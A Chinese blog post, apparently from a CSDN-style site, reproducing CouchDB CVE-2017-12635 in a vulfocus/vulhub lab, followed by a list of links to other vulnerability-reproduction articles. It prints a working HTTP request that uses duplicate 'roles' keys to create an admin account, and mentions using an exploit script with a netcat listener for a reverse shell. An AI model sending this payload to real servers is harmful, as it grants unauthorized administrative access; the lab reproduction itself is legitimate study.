CouchDB漏洞复现在vulfocus环境下

一、漏洞复现地址如下:
https://vulfocus.cn/
二、CouchDB复现权限绕过(CVE-2017-12635)
小于 1.7.0 以及 小于 2.1.1
可绕过创建权限而去实现任意创建admin权限的账号 实现登录。
1、正常创建数据包(发现无权限)
2、绕过权限数据包

PUT /_users/org.couchdb.user:vulhub{"type": "user","name": "vulhub","roles": ["_admin"],"roles": [],"password": "vulhub"}

3、成功实现绕过,到/_utils 目录下验证登陆。
三、CouchDB复现权限绕过(CVE-2017-12635)
实现权限绕过 并成功登录admin账号后,可实现此漏洞实现rce。直接使用了网上SF的exp脚本反弹shell如下:
这个环境换到了本地搭建的vulhub。
攻击机nc监听,直接执行脚本文件:

CouchDB漏洞复现相关推荐

  1. 漏洞检测与防御:Redis未授权访问漏洞复现

    漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...

  2. 成功爬取CVE-2019-9766漏洞复现【CSDN】【1】

    代码: import requests import bs4 from bs4 import BeautifulSoup import ress = '' headers = {'user-agent ...

  3. docker逃逸漏洞复现 cve-2019-5736

    0x01 概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现.该漏洞编号为CVE-2019-5736,漏洞影 ...

  4. php 远程代码执行漏洞复现 cve-2019-11043

    漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...

  5. java struts2 漏洞复现合集

    目录 一.S2-001复现 二.S2-005复现 三.S2-007复现 四.S2-008复现 五.S2-009复现 六.S2-012复现 七.S2-013复现 八.S2-015复现 九.S2-016复 ...

  6. Jenkins cve-2016-0792 漏洞复现 Xstream 反序列化漏洞

    环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 ...

  7. winrar远程代码执行漏洞复现(cve-2018-20250)

    使用metasploit验证漏洞 1.漏洞影响 WinRAR < 5.70 Beta 1 Bandizip< = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 ...

  8. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  9. Winrar目录穿越漏洞复现

    Winrar目录穿越漏洞复现 1.漏洞概述 WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在Windows环境下的图形界面.2019年 2 月 20 日Check Point团队爆出了 ...

最新文章

  1. 遗传算法与直接搜索工具箱学习笔记 -----从直接搜索算法开始
  2. inotify_add_watch使用注意
  3. JMeter初探二-badboy录制
  4. java 显示天气的小程序_超级简单的微信小程序获取今日天气预报代码 小程序获取七日天气...
  5. 慎用url重写(转)
  6. 函数、指针、数组的组合 及结构体和共用体
  7. react大数据量渲染_UseEffect在React中运行无限渲染(超过最大更新深度)
  8. 用yeoman搭建react画廊项目笔记
  9. 大数据奏鸣曲,听出了什么?
  10. USB闪存驱动器未显示在MacOS的Finder或磁盘工具上,是什么原因
  11. 11个LOGO设计灵感网站推荐,帮你提高LOGO设计工作效率
  12. potato chat 怎么用不了 土豆聊天软件 登陆不上 连接中 无法接收验证码 一直转圈...
  13. MacBook安装rar解压工具
  14. 19年程序员薪酬报告:平均年薪超70万,40岁后普遍遭遇收入天花板
  15. “adb”不是内部或外部命令,也不是可运行的程序或批处理文件——解决方案
  16. 做公众号能不能转载别人文章做文章素材?
  17. 计算机音乐数字谱抖音,抖音计算器谱子有哪些 计算器音乐乐谱大全
  18. 部署LVS-DR集群
  19. 2023年全国最新会计专业技术资格精选真题及答案8
  20. 从键盘输入一批字符(以@结束),按要求加密并输出。加密规则为:1.所有字母均转化为小写;2.若是a到y,则转化为下一个字母;3.若是z,则转化为a;4.其他字符保持不变

热门文章

  1. 实现英文单词按字典序排列的基数排序算法
  2. java web系统设计思路_JavaWeb——实战入门,设计思路总结。
  3. LSM303DLHC
  4. 英业达 GameOver
  5. Greenplum recover failed segment
  6. Gemini: Elastic SNARKs for Diverse Environments
  7. Centos7 linux 安装 redis 遇到的几个问题
  8. 同步github上的项目到gitcafe
  9. 数学分析闭区间套定理_闭区间套定理在数学教学中的一个有趣应用
  10. 从技术思维角度聊一聊,『程序员』摆地摊的正确姿势